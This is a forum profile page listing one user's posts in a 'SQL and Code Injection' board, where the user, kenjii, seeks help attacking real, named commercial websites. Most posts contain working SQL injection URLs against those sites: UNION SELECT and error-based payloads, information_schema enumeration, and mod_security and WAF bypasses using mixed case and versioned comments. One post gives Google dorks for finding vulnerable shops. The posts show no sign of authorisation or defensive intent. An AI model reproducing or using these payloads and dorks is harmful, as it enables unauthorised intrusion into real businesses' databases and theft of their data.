Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
The ha.ckers.org and sla.ckers.org web application security lab house rules and a place for you to introduce yourself if you like. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 38
6 months ago
kenjii
Thx for the hlep :)
Forum: SQL and Code Injection
6 months ago
kenjii
i'am not a pro the only sure thing i can tell u is that use mssql injection for having it else i didn't find :( to me it say : Your browser sent a request that this server could not understand. for any syntaxe i use after union, i also try for waf but seem to do not be protected....But that's why i use mssql injection... I search other way i think you are true but haven't find yet *i
Forum: SQL and Code Injection
6 months ago
kenjii
hi for hack this website i find 3 way, 1 USe error based injection To injection this website use ERROR Based injection http://www.pubblicitafaidate.it/index.php?prod=96 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- give u version in the error : Duplicate entry '5.1.49-3:1' for key 'group_key' 2 if u still whant to use UNION injection : In the message
Forum: SQL and Code Injection
6 months ago
kenjii
Hi i look at your link and found why you can't, the database is MySQL (microsoft)server for get it i use Mssql injection what is not the one i prefer :P You can find a lot of tutorial about mMssql injection and if you don't find you still can ask me :)
Forum: SQL and Code Injection
6 months ago
kenjii
haaa thank you very much i search for multiple way and haven't found really insteresting thing that can help me as u did again thank you very much
Forum: SQL and Code Injection
7 months ago
kenjii
hi all i'am finaly back :P My question is more about how to find vulnerability website than how to hack it . For exemple from now i use the dork Inurl:productdetail.php?id= for find website vulnerable to sql and after finish the google list i try : inurl:productdetail.php?id= intext:lord of ring for find new website. My problem is that nom i can write everything i whant in
Forum: SQL and Code Injection
7 months ago
kenjii
thank you sorry for the long time for answer :)
Forum: SQL and Code Injection
1 year ago
kenjii
ha before i give link the "hacking detected" wasn't here... i have tryed with url encod but for me it seem to work for table/column admin only, on all other tables/columns not working for me :( but thx for this tips :)
Forum: SQL and Code Injection
1 year ago
kenjii
thank you very much on other website when there is no data in column it simply write nothing and don't block me for get other data txh again for this info
Forum: SQL and Code Injection
1 year ago
kenjii
here is my news problem ;) http://www.livsupplies.co.uk/product_list.php?id=11 on this website i can see table -> http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1111,22222,table_name,444444,55555,database(),77777+from+information_schema.tables+where+table_schema=database()-- it don't need the - before id else i don't work... And the group_concat seem to not work t
Forum: SQL and Code Injection
1 year ago
kenjii
hi all i got an error on this website http://www.loytee.com/productDetail.php?ProductId={44439D22-59FB-15FC-692C-DE45EAE180EC} i'am sure we can hack this but i don't find what is wrong
Forum: SQL and Code Injection
1 year ago
kenjii
hi all it's me again :) i'am having 2 problem with this website : http://www.atpcb.com/atp/categories.php?p_cat=0 i can get it like this : http://www.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!50000Group_Concat(table_name)*/,4,5,6,7,8,9,10,11,12+from+/*!information_schema*/.tables+where+table_schema=database() but i reach the 1024 limit so i use ajk
Forum: SQL and Code Injection
1 year ago
kenjii
thank you very much !! i learn a lot from this, i was able to get them all :) Just the 1 give me some problemes http://www.laptopmela.com/productDetails.php?id=1279 i don't know why but for make it work i need to put in url direct if i use hackbar it don't work for me....
Forum: SQL and Code Injection
1 year ago
kenjii
hi all i'am having hard time with this website havij can get it me i can't get column... http://www.laptopmela.com/productDetails.php?id=1279 the same http://www.baliwestimports.com/product-detail.php?id=119 this one i can't see vulnerable column in code source http://www.muttluks.com/products.php?cat=-2 UNION SELECT 1111,2222,33333,4444,5555,6666,7777-- -&subcat=1 this one i
Forum: SQL and Code Injection
1 year ago
kenjii
thx after read your tutorial i can do this :)
Forum: SQL and Code Injection
1 year ago
kenjii
thank you very much i take a lot of time on reading your tutorial but now i understand
Forum: SQL and Code Injection
1 year ago
kenjii
hi it's me again :) http://www.universalpartymusic.com/productDetails.php?id=-288+/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database(),3,4,5,/*!50000GrOuP_CoNtAcT*/(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+/*!50000InFoRmAtIoN_ShEmA*/./*!50000TaBleS*/-- on this link i can count column, see the vulnerable but i can't see the table_name
Forum: SQL and Code Injection
1 year ago
kenjii
hi all i have some problem with this one http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,/*!500000group_concat*/(table_name),49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables i can get the fir
Forum: SQL and Code Injection
1 year ago
kenjii
thx very much this help me alot with a lot of website like this thank you !
Forum: SQL and Code Injection
1 year ago
kenjii
thank i have found with the lowercase it was my bad :( can you give me more info about concat_ws ?
Forum: SQL and Code Injection
1 year ago
kenjii
wow thank's a lot you answer to all my post :) for the msaccess it's ok i found but for the ,concat('</title>',version()) can you explain me more ? first time i see that.... and the same for this one concat(0x3c2f6c693e3c2f756c3e, version()) sorry for my bad english
Forum: SQL and Code Injection
1 year ago
kenjii
hi all it's me again :) on this link i can count column, but when i try to see vulnerable i go this error... Query failed: Unknown table 'categories_description' in field list http://www.siliconeintakes.com/category.php?cat=6/*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11
Forum: SQL and Code Injection
1 year ago
kenjii
hi all i can count the column but after mod security block me again... with this sintaxe it seem to be ok but show nothing... http://pardumansinghjewellers.com/product_detail.php?id=-29%20/*!UNunionION*/%20/*!SELselectECT*/%201,2,3,4,5,6-- somthing similar on this other link http://www.earthquakesupplycenter.com/product_detail.php?id=68&subcatid=0&categoryid=-2+/*!UNunionION*
Forum: SQL and Code Injection
1 year ago
kenjii
hi all i can count the column number but not see what column is vulnerable... http://www.hearingisbelieving.co.uk/accessories.php?accCat=2%20order%20by%2010 http://www.shoplocalstores.ca/productdetail.php?pid=62&id=45 http://www.cleanic.com.hk/EN/productDetail.php?id=434&series_id=-18%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
Forum: SQL and Code Injection
1 year ago
kenjii
hi all here is my problem http://allwaysus.com/category.php?id=17 UNION SELECT 1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()-- i can see the tables name but when i try to get the columns i just got nothing....
Forum: SQL and Code Injection
1 year ago
kenjii
well thank you !
Forum: SQL and Code Injection
1 year ago
kenjii
hi all i have found a link vulnerable to sql : http://www.tonixcomp.net/productDetail.php?Product_ID=-1706+/*!UNION*/+/*!SELECT*/+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+- i can get the database name, but not the version or get table etc... can you tell me what's wrong?
Forum: SQL and Code Injection
1 year ago
kenjii
hi all i have found another website with sql vulnerability but i just can do nothing Here is the link : http://www.izoomgraphics.com/index.php?main_page=product_info&products_id=145 Tools like acunetix say it's vulnerable to sql injection but everything i try don't work . it give me this alert : URL encoded GET input products_id was set to -1' or '3'='3 if somebody can help
Forum: SQL and Code Injection
1 year ago
kenjii
ok thank you me i know 0x3a for add : , it help me to read :)
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2